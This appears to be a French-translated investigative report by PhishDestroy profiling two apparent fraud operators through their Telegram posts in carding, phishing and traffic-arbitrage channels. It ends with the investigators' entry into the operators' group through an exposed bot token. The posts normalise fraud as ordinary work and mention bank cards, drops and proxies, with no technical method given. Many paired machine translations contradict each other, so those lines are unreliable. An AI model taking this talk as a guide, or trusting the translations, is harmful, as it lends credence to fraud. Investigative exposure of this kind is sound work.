-- SТYХ СНAT [ STYXMARKET.ST ] (2 messages) --
B
Prends ton temps2025-12-05 12:04
Besoin de factures, Payzaty, Cashfree, Eportal 3DSBesoin de factures, Payzaty, Cashfree, Eportal 3DS
B
Prends ton temps2025-11-22 11:14
Y a-t-il un modérateur ?Y a-t-il un modérateur sur le chat ?
-- Chat Arbitrage de trafic (2 messages) --
B
Prends ton temps2025-11-24 14:50
100 %100 %
B
Prends ton temps2025-11-24 14:49
La chaîne Tg va être détournéeLe canal Telegram va être piraté
-- Vérificateur Raven CC (2 messages) --
B
Prends ton temps2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Prends ton temps2025-11-21 21:18
/vérifier/vérifier
-- Chat Vision Browser (2 messages) --
B
Prends ton temps2025-11-14 16:47
Merci.Merci
B
Prends ton temps2025-11-14 16:47
vicen travaille à ru ?un travail visible en russe ?
-- 💬ONE|Chat (86 messages) --
B
Prends ton temps2025-03-05 17:06
Les gars, indiquez-moi un magasin où je peux acheter des tampons.Les gars, donnez-moi une adresse où je peux trouver des terrains
B
Prends ton temps2025-03-05 16:22
Je n'arrive même pas à faire un manucureIl ne sait même pas faire une manucure
B
Prends ton temps2025-03-05 16:22
de mêmede même
B
Prends ton temps2025-03-05 16:21
Putain, dis-moi si le tuteur a un salon de discussion avec les élèves ou pas.Putain, quelqu'un peut-il me dire si le tuteur a un chat avec ses élèves ou pas ?
B
Prends ton temps2025-03-05 16:10
et à qui appartient-il ?Et qui est-ce ?
B
Prends ton temps2025-03-05 15:44
Ce n'est pas difficile, mais il n'y a pas de manuels complets ici, seulement des tutoriels.Ce n'est pas difficile, mais il n'y a pas de manuels complets ici, seulement des conseils des formateurs
B
Prends ton temps2025-03-05 15:42
En gros, oui, si tu sais comment t'y prendre.en fait, oui, si tu sais comment faire
B
Prends ton temps2025-03-05 15:42
une demi-journéeune demi-journée
B
Prends ton temps2025-03-05 15:42
Le premier en compte 600, mais il ne répond pas.Il ne répond pas aux 600 premières personnes
B
Prends ton temps2025-03-05 15:41
Si vous en avez les moyens, optez pour celui qui coûte 200 $.Si tu as de l'argent, prends celui qui demande 200 $.
B
Prends ton temps2025-03-05 13:55
Qui sait parfaitement expliquer qu'il existe un forum de discussion pour les étudiants ?Y a-t-il un forum de discussion pour les élèves qui suivent des cours de science-fiction là-bas ?
B
Prends ton temps2025-03-03 15:10
ChèquesChèques
B
Prends ton temps2025-03-03 15:10
Celui qui passe l'aspirateurQui passe l'aspirateur
B
Prends ton temps2025-03-03 15:10
D'accordIl y en a
B
Prends ton temps2025-03-03 15:10
Il y a sûrement des prostituées qui travaillent dans l'informatique.Mais là, c'est sûr qu'il y a des pirates informatiques
B
Prends ton temps2025-03-03 15:09
C'étaitC'était
B
Prends ton temps2025-03-03 15:09
Ah, ça, c'est bien.Ah, ça, c'est cool
B
Prends ton temps2025-03-03 15:09
La tour à trois niveauxTrinuriuet ruru
B
Prends ton temps2025-03-03 15:09
Et on les collecteEt on les ramasse
B
Prends ton temps2025-03-03 15:09
Tip est juste assis là à tripoter des emballagesUn type est assis là, en train de jeter des emballages de bonbons
B
Prends ton temps2025-03-03 15:04
Pourquoi y a-t-il des plaques d'immatriculation ukrainiennes ?Pourquoi des numéros ukrainiens ?
B
Prends ton temps2025-03-03 15:03
J'ai dit « kc ».J'ai dit « kts »
B
Prends ton temps2025-03-03 15:03
J'ai compris.J'ai compris
B
Prends ton temps2025-03-03 15:03
Si c'est compliqué, tu vas perdre ton chapeau melon.Si tu fais ça, tu vas te faire virer d'ici
B
Prends ton temps2025-03-03 15:03
Putain, on va comparer le nombre de fois où tu vas relancer le Facebook pendant que je retire le roux.Allez, vas-y, compare : combien de fois tu vas relancer le recul sur Facebook pendant que je filme ?
B
Prends ton temps2025-03-03 15:02
Pour une escortePour un service d'escorte
B
Prends ton temps2025-03-03 15:02
Ces types ont un développement mental de merde, c'est de quoi faire un putain de branleur.Ces types de tricheurs ont un développement à faire chier, ça donne envie de se branler
B
Prends ton temps2025-03-03 15:02
Putain, y'a que des « woke » ici.Y a que des travailleurs manuels ici
B
Prends ton temps2025-03-03 15:02
Quel type de tables ?Quelles tables ?
B
Prends ton temps2025-03-03 15:01
Tu auras 30 ans si tu as une belle voix.Tu en auras 30 si tu as une belle voix
B
Prends ton temps2025-03-03 15:01
Il y a plus d'argentIl y a plus d'argent là-bas
B
Prends ton temps2025-03-03 15:01
Venez travailler chez moi.Venez travailler chez moi au centre culturel
B
Prends ton temps2025-03-03 15:00
NoNon
B
Prends ton temps2025-03-03 14:59
PlategamPlategam
B
Prends ton temps2025-03-03 14:59
+ Je ne sais pas comment utiliser la fonction de relecture+ Je ne comprends rien aux rimes
B
Prends ton temps2025-03-03 14:59
Les bonnes affaires sont rares.C'est difficile de trouver de bons drops
B
Prends ton temps2025-03-03 14:58
Ou existe-t-il une version 1.0 ?Ou bien la version 1.0 est disponible
B
Prends ton temps2025-03-03 14:58
Il n'y a que la version 2.0 de Phish ici.Et là, les fiches pour un courant de 2,0 A
B
Prends ton temps2025-03-03 14:58
Ou alors, mieux vaut 1.0 que 2.0.Bon, mais mieux vaut 1.0 que 2.0
B
Prends ton temps2025-03-03 14:57
Avec les mammouthsAvec les mammouths
B
Prends ton temps2025-03-03 14:57
La version 2.0 ne fonctionne pas si on reste les bras croisés à ne rien faire.2.0, ça ne sert à rien de rester là à papoter
B
Prends ton temps2025-03-03 14:57
Je m'y connais plutôt en circulation routière.Ce n'est plus moi qui ai le plus de trafic
B
Prends ton temps2025-03-03 14:57
Voici les X de RooVoici les X sur la main
B
Prends ton temps2025-03-03 14:56
Mais ce ne sont pas des slogans publicitairesMais ce ne sont pas des équipes de publicité
B
Prends ton temps2025-03-03 14:56
C'est vrai. Je connais quelqu'un qui le fait.(Ils le font) J'ai des connaissances qui le font
B
Prends ton temps2025-03-03 14:56
Ce n'est pas le cas si tu sais comment gagner entre 400 et 500 par jour.Mais bon, si on sait s'y prendre, certains en gagnent 400 à 500 par jour
B
Prends ton temps2025-03-03 14:55
Et alors, où est le problème ?)Mais bon, qu'est-ce que j'ai bien pu oublier ici ?
B
Prends ton temps2025-03-03 14:55
Il y a un lien vers le manuelIl y a un lien vers le manuel
B
Prends ton temps2025-03-03 14:54
Voilà le genre de mainsVoilà le genre de choses qu'ils vont faire
B
Prends ton temps2025-03-03 14:54
À baver et à faire les yeux doux juste pour se faire branler.Pour baiser, il suffit de saliver et d'écarquiller les yeux
B
Prends ton temps2025-03-03 14:54
Mais bon, où est le problème ? C'est le même travail.Mais alors, où est le problème ? C'est exactement le même travail.
B
Prends ton temps2025-03-03 14:53
Il faudra un mois pour arriver dans la zoneIls arriveront dans la zone dans un mois
B
Prends ton temps2025-03-03 14:53
Et il n'y a nulle part où aller. Si tu as un peu de jugeote, tu comprendras. Sinon, tu te casses d'ici.Et puis, on ne sait pas trop quoi faire ici : si on y réfléchit bien, on s'en sort, sinon, on ne sait pas quoi faire
B
Prends ton temps2025-03-03 14:53
Qu'est-ce que tu veux ?Qu'est-ce que tu voulais ?
B
Prends ton temps2025-03-03 14:53
PublicitéPublicité
B
Prends ton temps2025-03-03 14:52
Ça fait deux jours que je suis là et la version 2.0 ne m'intéresse pas. Je trouvais ça cool.Ça fait deux jours que je suis là et la version 2.0 ne m'intéresse pas, je pensais que ce serait sympa
B
Prends ton temps2025-03-03 14:52
Et passez une journée mémorableEt élever un mammouth
B
Prends ton temps2025-03-03 14:52
Réfléchis bien à ce que tu vas dire.Je vais réfléchir à ce que je vais répondre
B
Prends ton temps2025-03-03 14:52
Il n'y a pas de secretsIl n'y a pas de secret
B
Prends ton temps2025-03-03 14:52
Que va-t-il t'offrir ?Que vous apportera-t-il ?
B
Prends ton temps2025-03-03 14:52
Mais à quoi ça sert si le manuel contient exactement les mêmes informations ?Mais à quoi ça sert si toutes ces infos sont dans le manuel ?
B
Prends ton temps2025-03-03 14:51
Il aura le temps de répondre à toutes vos questionsOn va pas pouvoir répondre à tout le monde
B
Prends ton temps2025-03-03 14:51
Quelle séance d'entraînement !Quelle pratique ?
B
Prends ton temps2025-03-03 14:51
Il y a une centaine de personnes là-dedans.Bon sang, il y en a une centaine là-bas
B
Prends ton temps2025-03-03 14:51
Pourquoi ne me donnerais-tu pas un peu d'argent pour que je te donne le mode d'emploi de la pince ?Si vous me donnez un peu de fric, je vous enverrai le manuel par e-mail
B
Prends ton temps2025-03-03 14:50
Lors de la fixationEn annexe
B
Prends ton temps2025-03-03 14:50
Tu n'as pas besoin d'un manuel pour tout apprendre.Et puis merde à votre formation, y'a le manuel, c'est tout
B
Prends ton temps2025-03-03 14:50
La version 2.0 est ce qu'elle est.2.0 Ce qui était, c'est ce qui est
B
Prends ton temps2025-03-03 14:50
C'est quoi le problème, bordel ?Mais c'est quoi ce casse-tête ?
B
Prends ton temps2025-03-03 14:48
C'est toi qui as commencé ?Tu t'es déjà lancé ?
B
Prends ton temps2025-03-03 14:48
Pas de « coucou »Ça ne marche pas du tout
B
Prends ton temps2025-03-03 14:48
Il y a une visite sur le siteIl y a un meurtre
B
Prends ton temps2025-03-03 14:48
C'est quoi le problème avec l'lk ?Combien d'œuvres par heure ?
B
Prends ton temps2025-03-03 14:48
Lequel de ces types êtes-vous, comme vous le dites vous-mêmes ?Mais qui sont ces connards, comme tu l'as dit toi-même ?
B
Prends ton temps2025-03-03 14:47
Je ne comprends pas ce que tu veux dire là.Je n'ai pas bien compris ce que tu as dit là
B
Prends ton temps2025-03-03 14:46
S'ils sont connectés, tant mieux.Si on entre dans le LC, alors ZBS
B
Prends ton temps2025-03-03 14:46
Alors, est-ce qu'ils se connectent ?Alors, vous allez sur le forum ?
B
Prends ton temps2025-03-03 14:45
Je ne sais pas comment ils les filment.Je sais pas trop comment on les enlève
B
Prends ton temps2025-03-03 14:45
Des chiens à mettre au rebut ?Tu fumes un joint ?
B
Prends ton temps2025-03-03 14:45
Putain, y a un putain de boutonEt puis merde, on va encore devoir se taper ça
B
Prends ton temps2025-03-03 14:42
Je le sers moi-mêmeC'est moi qui verse
B
Prends ton temps2025-03-03 14:42
J'ai fini par comprendre que c'était pas pour les conards.J'ai compris, putain, c'est pas pour rien
B
Prends ton temps2025-03-03 14:41
Mec, ils ne vendent rien avec des jetons ici, c'est un jeton de paie.Mec, ici, on ne vend rien avec des jetons, il faut payer en jetons
B
Prends ton temps2025-03-03 14:41
Je comprends, il n'y a nulle part où le verserJ'ai compris qu'il n'y avait nulle part où le verser
B
Prends ton temps2025-03-03 14:40
La version 2.0 standard, je crois.Des 2.0 classiques, en quelque sorte
B
Prends ton temps2025-03-03 14:40
Ce n'est pas comme s'ils engorgeaient la circulationMais ici, on ne génère pas de trafic
-- Fbstore - Le forum des webmasters à succès ! (23 messages) --
B
Prends ton temps2025-02-26 07:51
Bon, fais ce que tu veux, putain.Bon, tant pis, on s'en fiche de qui c'est
B
Prends ton temps2025-02-26 07:50
Un écolier, 200 roubles.Bon, 200 roubles pour la carte d'étudiant
B
Prends ton temps2025-02-26 07:50
Ça va marcherÇa ira
B
Prends ton temps2025-02-26 07:50
Tu vas croiser un sans-abri dans la rue.Je suis désolé, mais je ne peux pas t'aider là-dessus.
B
Prends ton temps2025-02-26 07:50
Tout le monde croit donc en son propre visage, quel qu'il soit.Tout le monde vérifie son identité là-bas, on s'en fiche de qui c'est
B
Prends ton temps2025-02-26 07:50
Sur le visage.À ses propres frais
B
Prends ton temps2025-02-26 07:49
Mais bon, peu importe, je l'ai déjà fait dix fois.Mais en fait, je m'en fiche, j'ai déjà une dizaine de comptes vérifiés
B
Prends ton temps2025-02-26 07:49
Alors dis-moi, tu ne fais que débiter des bêtises.Alors dis-moi, tu racontes n'importe quoi
B
Prends ton temps2025-02-26 07:49
Vous pouvezC'est possible
B
Prends ton temps2025-02-26 07:49
Sur le visage.À ses propres frais
B
Prends ton temps2025-02-16 20:26
au lieu de les mettre dans le pétrin avec une formation bidon et de les envoyer sur la route.au lieu de leur faire miroiter une formation bidon et de leur soutirer de l'argent
B
Prends ton temps2025-02-16 20:25
loi normale, UBT, TT, YouTube, etc.les liens habituels vers UBT, TT, YouTube, etc.
B
Prends ton temps2025-02-15 17:31
XzХз
B
Prends ton temps2025-02-15 17:31
Sous prétexte de formationSous prétexte de formation
B
Prends ton temps2025-02-15 17:31
Vers les canauxSur les chaînes
B
Prends ton temps2025-02-15 17:31
C'est juste la foule.C'est juste que le trafic généré par les gens est impressionnant
B
Prends ton temps2025-02-15 17:31
Le type dit donc de s'abonner à toutes ses chaînesCe type dit de s'abonner à toutes ses chaînes
B
Prends ton temps2025-02-15 16:36
Tu n'as pas besoin d'écrireHui Nyu propose de ne pas écrire
B
Prends ton temps2025-02-06 15:11
Si tu ne maîtrises pas les bases du service, tu vas te retrouverSi tu ne connais pas les bases, comment vas-tu t'y prendre ?
B
Prends ton temps2025-02-06 15:11
Il y a un bouton pour modifier l'aipi, tu devrais au moins faire une recherche sur Google.En cliquant sur ce bouton, l'adresse IP change; tu peux toujours chercher sur Google
B
Prends ton temps2025-02-06 15:10
🤨🤨
B
Prends ton temps2025-02-06 15:09
Vous pouvez modifier l'aipi qui s'y trouve en le faisant pivoter.Là, on peut modifier la rotation de l'API
B
Prends ton temps2025-02-06 15:09
Pourquoi 1, c'est pareil MobilePourquoi 1, c'est pourtant Mobile
-- CryptoGrab - Chat d'entraide (10 messages) --
B
Prends ton temps2025-02-06 15:31
Ce n'est pas si simpleCe n'est pas si simple
B
Prends ton temps2025-02-06 15:31
C'est facile.Trace
B
Prends ton temps2025-01-23 20:30
Pas un seul exempleIl n'y a pas qu'un seul exemple
B
Prends ton temps2025-01-23 20:30
Ce n'est pas drôle que je n'aie trouvé aucune annonce pour des tests de dépistage de la LMA sur Internet.C'est marrant, je n'ai trouvé aucune pub pour les tests AML sur Internet
B
Prends ton temps2025-01-23 17:20
Il n'y a absolument rien sur l'AML.Il n'y a absolument rien sur AML
B
Prends ton temps2025-01-23 17:20
J'ai essayé AML sur Facebook pour trouver des fichiers .aml, y compris des versions anciennes introuvables sur InternetJ'ai essayé de trouver des liens sur Facebook, mais je n'ai pas trouvé de liens intéressants, même parmi les plus anciens, sur Internet.
B
Prends ton temps2025-01-23 17:19
Alors, quel genre d'offre envisages-tu ?Au fait, quelle offre envisages-tu ?
B
Prends ton temps2025-01-23 17:16
Utilisez-vous AML ?Et toi, tu joues à AML ?
B
Prends ton temps2025-01-21 20:38
Si vous vous occupez de Facebook, j'aimerais que vous m'éclaircissiez quelques pointsY a-t-il quelqu'un qui s'occupe de la page Facebook ? J'aimerais poser quelques questions
B
Prends ton temps2025-01-20 11:08
Quelqu'un aurait-il des exemples de créos pour l'AML ?Quelqu'un aurait-il des exemples de créations pour l'AML ?
-- Rolex | discussion générale (28 messages) --
B
Prends ton temps2024-09-11 15:29
Que font les Lituaniens sur quel terrain ?Et sur quelle plateforme on s'en prend à la Lituanie ?
B
Prends ton temps2024-09-11 15:21
Tu es en train de tripoter la vis ?Tu es complètement à l'ouest ou quoi ?
B
Prends ton temps2024-09-11 15:20
C'est juste que ces sites sont super contraignants et qu'il faut passer un temps fou à se débattre avec euxC'est juste que ces plateformes limitent beaucoup le travail et qu'elles sont vraiment pénibles
B
Prends ton temps2024-09-11 15:19
J'ai une idée de thème en tête. S'ils la concrétisent, ça va être génial.J'ai eu une idée là-bas et je l'ai postée; si ça se concrétise, ça va être génial
B
Prends ton temps2024-09-11 15:19
Je ne vois pas beaucoup de rondins sur la propriété.Je ne vois pas vraiment de logos sur la Finka
B
Prends ton temps2024-09-11 15:19
Il y a vraiment des trucs de dingue qui se passent avec toutes ces salles.Mais enfin, ces types sont en plein bordel avec toutes leurs plateformes
B
Prends ton temps2024-09-11 15:16
C'est exactement ce que je veux dire, c'est comme un Ford sur un Ford.Eh bien, je dis juste que c'est de la triche sur de la triche
B
Prends ton temps2024-09-11 15:15
Je ne comprends pas ce qui va mieux maintenant, je vois bien que personne ne travaille en Finlande.Je ne comprends vraiment pas ce qui marche le mieux en ce moment, je vois que chez tout le monde, quelque chose ne fonctionne pas avec la carte bancaire
B
Prends ton temps2024-09-11 15:08
Eh bien, tu as une chance sur deux d'avoir de la chance avec les proxys.Bon, c'est 50/50, si on a de la chance avec les proxys
B
Prends ton temps2024-09-11 15:07
Mais pour que tu comprennes bien, aujourd'hui, avec les proxys de luxe, même sur Viber, dès que tu te connectes, ça plante.Mais pour que tu comprennes bien : avec ces proxys de luxe, même sur Viber, quand tu te connectes, ça plante
B
Prends ton temps2024-09-11 15:07
Eh bien, je ne sais pas trop pour les canettes européennes.Bon, je ne m'y connais pas trop en banques européennes
B
Prends ton temps2024-09-11 15:07
Et lkDans le panier
B
Prends ton temps2024-09-11 15:06
Autrefois, les épiceries fines disposaient de 10 chambres froidesAvant, les laques à 10 couches tenaient bien
B
Prends ton temps2024-09-11 15:06
Bon, le 922 est lui aussi en place et tient bon.Bon, le 922 aussi, ils en ont un qui passe
B
Prends ton temps2024-09-11 15:05
Même en privé, après trois visites, ça leur fait peur.Même en privé, après trois tentatives, ça les énerve
B
Prends ton temps2024-09-11 15:05
Si 1 mandataire pour 1 à 2 banquesSi 1 proxy, 1 à 2 ampères
B
Prends ton temps2024-09-11 15:05
Eh bien, ça dépend de la banqueÇa dépend de la banque
B
Prends ton temps2024-09-11 15:04
Les mandataires sont souvent des crapules dans ce cirque de laksheriDans le lacshéri huinya, les proxys sont souvent malpropres
B
Prends ton temps2024-09-11 08:44
Est-ce qu'il dort ?Et lui, il dort ?
B
Prends ton temps2024-09-11 08:40
Oh, c'est une excellente idée.C'est ZBS qui a eu cette idée
B
Prends ton temps2024-09-11 08:40
Il n'y aurait pas un marché aux puces ou quelque chose comme ça ?Mais pourquoi n'y a-t-il pas de brocantes un peu partout chez eux ?
B
Prends ton temps2024-09-11 08:40
C'est n'importe quoiUne connerie
B
Prends ton temps2024-09-11 08:39
BalleBily
B
Prends ton temps2024-09-11 08:39
Y a-t-il des forums de discussion ?Y a-t-il des forums de discussion là-bas ?
B
Prends ton temps2024-09-11 08:38
Quelqu'un sait-ilQuelqu'un sait-il
B
Prends ton temps2024-09-11 08:38
Est-ce que les gens de la finca utilisent TG ?Est-ce que les gens utilisent Telegram en Finlande ?
B
Prends ton temps2024-09-10 12:14
Merci.Merci
B
Prends ton temps2024-09-10 12:13
Quelle heure est-il en Finlande ?C'est l'heure de la pause à la Fink
-- Actualités/vérifications/revenus💃🛍 (37 messages) --
B
Prends ton temps2024-06-16 17:17
Je ne vois personne qui la défende avec acharnementJe ne vois pas ici de fervents défenseurs de celle-ci
B
Prends ton temps2024-06-16 17:17
En fin de compte, la situation a été exposée, et chacun fait son propre choix; le fait que seul l'administrateur Pasha la défende en dit long.Bon, j'ai expliqué la situation, et maintenant chacun fait son choix; le fait que seule l'administratrice Pasha la défende en dit long.
B
Prends ton temps2024-06-16 17:15
Et elle n'a pas payé une nouvelle foisEt elle n'a encore pas payé
B
Prends ton temps2024-06-16 17:15
Non, elle nous l'a transféré, mais comme nous n'avions pas le compte principal pour transférer l'argent, nous avons écrit à Vika en dernier recours.Non, elle nous l'a refilée, mais comme nous n'avions pas le compte principal pour transférer l'argent, nous avons écrit à Vika en dernier recours
B
Prends ton temps2024-06-16 17:14
Au début, tout allait bien pour nous aussi, mais ces derniers temps, ton argent disparaît sans arrêt.Au début, tout allait bien chez nous aussi, mais ces derniers temps, vous perdez sans cesse de l'argent
B
Prends ton temps2024-06-16 17:14
Est-ce que je fais du spam ? Je suis juste là à dire la vérité aux gens. Tu peux jeter ça. Fais savoir aux gens comment tu travailles.Et moi, j'ai du spam ? Je passe mon temps à dire la vérité aux gens, tu peux supprimer ça, ça ne changera rien, que les gens sachent comment vous travaillez
B
Prends ton temps2024-06-16 17:13
Quand vous en avez unSi cela vous arrive
B
Prends ton temps2024-06-16 17:13
Il est donc temps pour toi de réfléchirIl est donc temps pour vous de réfléchir
B
Prends ton temps2024-06-16 17:13
Nous travaillons également avec nei depuis longtemps et c'est la deuxième fois que cela se produitNous travaillons avec elle depuis longtemps déjà, et c'est déjà la deuxième fois que cela arrive
B
Prends ton temps2024-06-16 17:13
Et elle a enregistré les données et a dit : « Tu sais comment ça marche. »Et elle a noté « gs » et a dit que vous saviez comment ça fonctionnait
B
Prends ton temps2024-06-16 17:13
C'est exactement ce qui s'est passé. Reprenons depuis le début : on a pris sa carte pour retirer de l'argent, on a mis 60 000, elle est allée les retirer et nous a écrit que l'argent ne serait pas là parce que le distributeur avait avalé la carte, et voilà, on vient de jeter 60 000 par la fenêtre.C'est exactement ça. Bon, reprenons depuis le début : on lui a donné une carte bancaire, on a versé 60 000 roubles dessus, elle est allée les retirer et nous a dit qu'il n'y aurait pas d'argent, prétextant que le distributeur avait avalé sa carte. Bref, on a tout simplement perdu nos 60 000 roubles.
B
Prends ton temps2024-06-16 17:11
Ce n'est pas elle qui nous tientEt non pas nous chez elle
B
Prends ton temps2024-06-16 17:11
Même si on nous a volé 60 000 eurosMême si on nous a volé 60 000
B
Prends ton temps2024-06-16 17:11
Normal ? On a tout expliqué ici. Tu es en train de dire qu'on est des idiots.Normaux ? On a tout expliqué ici, et vous dites qu'on est des idiots
B
Prends ton temps2024-06-16 17:10
Tu la défendsVous la défendez
B
Prends ton temps2024-06-16 17:10
Elle a toujours notre argentElle a gardé notre argent
B
Prends ton temps2024-06-16 17:10
TousTout
B
Prends ton temps2024-06-16 17:10
« Un type lui a proposé 60 000 dollars, mais elle a dit qu'elle n'avait pas d'argent. »On lui a versé 60 000 roubles, mais il a dit qu'il n'y aurait pas d'argent
B
Prends ton temps2024-06-16 17:10
Décrite*Décrit*
B
Prends ton temps2024-06-16 17:10
On vous a expliqué toute la situationOn t'a expliqué toute la situation
B
Prends ton temps2024-06-16 17:09
Qui va craquer ? Elle ou nous.Qui est la responsable, elle ou nous ?
B
Prends ton temps2024-06-16 17:09
On a 60 000 dollars à la banque. Où est l'argent ?On a versé 60 000, où est passé l'argent ?
B
Prends ton temps2024-06-16 17:09
On t'a expliqué la situation en détail, peu importe ton sexe.Quelles femmes t'ont expliqué toute la situation ? Le sexe n'a aucune importance.
B
Prends ton temps2024-06-16 17:08
Retire 60 000 euros et arrête là pour aujourd’hui.Gagner 60 000 et passer à autre chose
B
Prends ton temps2024-06-16 17:08
Ou va te faire foutre, dans la limite du raisonnable.Ou alors, putain, dans la limite du raisonnable
B
Prends ton temps2024-06-16 17:08
Les gens n'ont pas les moyens de payerComment les gens vont-ils payer ?
B
Prends ton temps2024-06-16 17:08
Et il dit que sa carte a été avalée par le distributeur et qu'il n'a plus d'argent.Et il dit que la carte est bloquée, qu'il n'y a pas d'argent
B
Prends ton temps2024-06-16 17:08
On lui a versé 60 000 dollars, et elle est partie tourner le film.On a versé 60 000 roubles à cette femme, qui est partie les retirer
B
Prends ton temps2024-06-16 17:07
Alors, tu vas me donner les faits.Alors, explique-moi ça
B
Prends ton temps2024-06-16 17:07
Alors, c'est qui le coupable, bon sang ? C'est moi le responsable ?Mais alors, c'est qui le coupable, c'est moi le bouc émissaire ?
B
Prends ton temps2024-06-16 17:07
Tu n'as rien à dire ?Tu n'as rien à dire ?
B
Prends ton temps2024-06-16 17:07
Ou alors, j'arrivais pas à taper ce putain de code.Ou alors, putain, j'ai pas réussi à taper « pin » parce que j'ai les mains tordues
B
Prends ton temps2024-06-16 17:06
Mais comment un distributeur automatique a-t-il pu bloquer la carte, bon sang ?Mais putain, comment un distributeur a-t-il pu avaler ma carte ?
B
Prends ton temps2024-06-16 17:06
VentousesAspirations
B
Prends ton temps2024-06-16 17:06
Et toi, tu te donnes à fond pour elle.Mais pourquoi vous vous acharnez à la soutenir ?
B
Prends ton temps2024-06-16 17:06
Vous, les « pros », vous êtes vraiment des idiots. Y a une nana assise là qui se prend la tête avec son argent, et son carte s'est fait avaler par un distributeur.Putain, vous êtes vraiment des cons, vous avez un connard qui vous colle aux basques, et en plus, le distributeur lui a avalé sa carte
B
Prends ton temps2024-06-16 16:40
@kysia1987, ça ne marche pas, c'est une arnaque; j'ai donné un coup de pied et j'ai fusionné avec 60 000@kysia1987 : c'est une arnaque, ça a chuté et j'ai perdu 60 000
MONETTI ESCOBAR : Le patron silencieux
Contrairement aux 261 messages de Bonya, MONETTI n'a publié que 10 messages publics — le tout dans un seul fil de discussion sur Chat TraFFeeQ (Arbitrage de trafic ADS/SEO noir), en prenant la défense d'un collègue :
Chat TraFFeeQdécembre 2025
« Un homme fait son travail, il est payé pour ça — ça te dit d'en discuter ? »
Une personne fait son travail, elle est payée pour ça, y a-t-il matière à discussion ?)
Présenter les activités criminelles comme « un travail comme un autre »
Chat TraFFeeQdécembre 2025
« Il n'y a rien à discuter avec toi »
Il n'y a rien à discuter avec toi
Autorité dédaigneuse — mentalité de chef, au-dessus de tout débat
Chat TraFFeeQdécembre 2025
« Il y a plein d'autres choses à faire que de s'occuper de toi ! »
Sans toi, j'ai de quoi m'occuper)
Cela implique plusieurs opérations simultanées qui requièrent son attention
Les groupes Telegram de MONETTI en disent long : Medusa Google Ads (fraude au PPC de type « black hat »), un Chaîne Deepfakes (supports synthétiques utilisés à des fins frauduleuses), et Chat Marlboro (privé, inconnu). L'abonnement Telegram Premium, disponible 24 h/24 et 7 j/7, et « Есть предложение » (« J'ai une proposition à vous faire ») Le profil professionnel de cette personne donne l'impression qu'elle considère la cybercriminalité comme une activité à plein temps.
MONETTI ESCOBAR : Journal complet des messages (10 messages)
-- TraFFeeQ Chat | Arbitrage de trafic | Black ADS/SEO | (9 messages) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Laisse tomber !Laisse tomber !
ME
MONETTI ESCOBAR2025-12-06 20:42
Un homme fait son travailCet homme vaque à ses occupations
ME
MONETTI ESCOBAR2025-12-06 20:42
Aucune agressionAucune agression
ME
MONETTI ESCOBAR2025-12-06 20:40
Ne t'en fais pas pour ça non plusNe t'inquiète pas pour ça non plus
ME
MONETTI ESCOBAR2025-12-06 20:39
Parle-lui, mon pote. Il a le droit de le faire.Va lui parler, mec, personne ne lui a interdit de le faire
ME
MONETTI ESCOBAR2025-12-06 20:39
Il y a plein d'autres choses à faire que de s'occuper de toi !)Il y a autre chose à faire que de m'occuper de toi !)
ME
MONETTI ESCOBAR2025-12-06 20:39
Il n'y a rien à discuter avec toiIl n'y a rien à discuter avec toi
ME
MONETTI ESCOBAR2025-12-06 20:38
C'est écrit à côté de son surnom. Pas besoin de cliquer, tu le verras tout de suite.À côté de son pseudo, c'est écrit « ne pas taper », lis bien
ME
MONETTI ESCOBAR2025-12-06 20:38
Cet homme fait son travail, il est payé pour ça (j'aimerais en discuter)Chacun fait son travail, il est payé pour ça, si ça vous plaît, discutez-en)
-- Medusa | Google Ads | Chat (1 message) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Capture d'écran 2 — Profil Telegram de MONETTI.
Capture d'écran 3 — Le profil de Bonya. Notez DC2 (Amsterdam).
Section 7 : La pièce de sécurité
Après que PhishDestroy eut accédé au groupe d'opérateurs via le bot Telegram exposé, l'échange suivant a eu lieu. Le journal de discussion ci-dessous a été traduit en anglais, le texte original en russe étant conservé en italique. L'identité utilisée pour l'accès a été masquée.
— REDACTED s'est connecté à l'aide d'un jeton de bot exposé —
R
CENSURÉ25-03-2026 13:03:43
/début
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
QuiQui
B
Prends ton temps25-03-2026 13:07:14
XzХз
R
CENSURÉ25-03-2026 13:07:14
Bonjour, il suffit d'enregistrer tes données, attends un instant
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Mais qu'est-ce que c'est que ce bordel ?Mais putain
B
Prends ton temps25-03-2026 13:07:27
PutainPutain
B
Prends ton temps25-03-2026 13:07:28
C'est luiEt alors ?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Ah bon.Haha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
C'est quoi ce bordel ?Bon sang
B
Prends ton temps25-03-2026 13:07:53
Le bot a été piratéLe bot a été piraté
B
Prends ton temps25-03-2026 13:08:16
On m'a dit que notre défense était complètement à la ramasse.Au fait, on m'a dit que chez nous, la sécurité est vraiment nulle
B
Prends ton temps25-03-2026 13:08:22
Eh bien, il y a un typeEn gros, un type
B
Prends ton temps25-03-2026 13:08:43
C'est comme faire passer un bot par une attaque de phishing.Avec notre bot, casser un fish, c'est aussi simple que de se cogner le doigt contre le doigt
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[SUPPRIMÉ].[SUPPRIMÉ]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Qui est-ce ?Qui est-ce ?
B
Prends ton temps25-03-2026 13:10:29
Vérifiez votre profil.Va voir ton profil
B
Prends ton temps25-03-2026 13:10:32
C'est un pirate informatiqueC'est un pirate informatique
B
Prends ton temps25-03-2026 13:10:35
Littéralement.Au sens propre
B
Prends ton temps25-03-2026 13:10:41
Traduction de ce qu'il canaliseOn a traduit ce qu'il écrit sur la chaîne
B
Prends ton temps25-03-2026 13:10:55
[SUPPRIMÉ — Bonya copie-colle le message de la chaîne qui a signalé leur domaine, dans le but d'identifier la personne qui les a signalés]
B
Prends ton temps25-03-2026 13:12:19
Bon, euh...Bon, voilà
B
Prends ton temps25-03-2026 13:12:23
Je sais pas qui c'est, putain.Je n'en ai pas la moindre idée
B
Prends ton temps25-03-2026 13:12:25
Mais pas pour toujoursMais pas en bon
B
Prends ton temps25-03-2026 13:12:47
@devosus, pensons à la défense avant de nous faire laminer.@devosus, pense à te protéger avant qu'on te mette une raclée
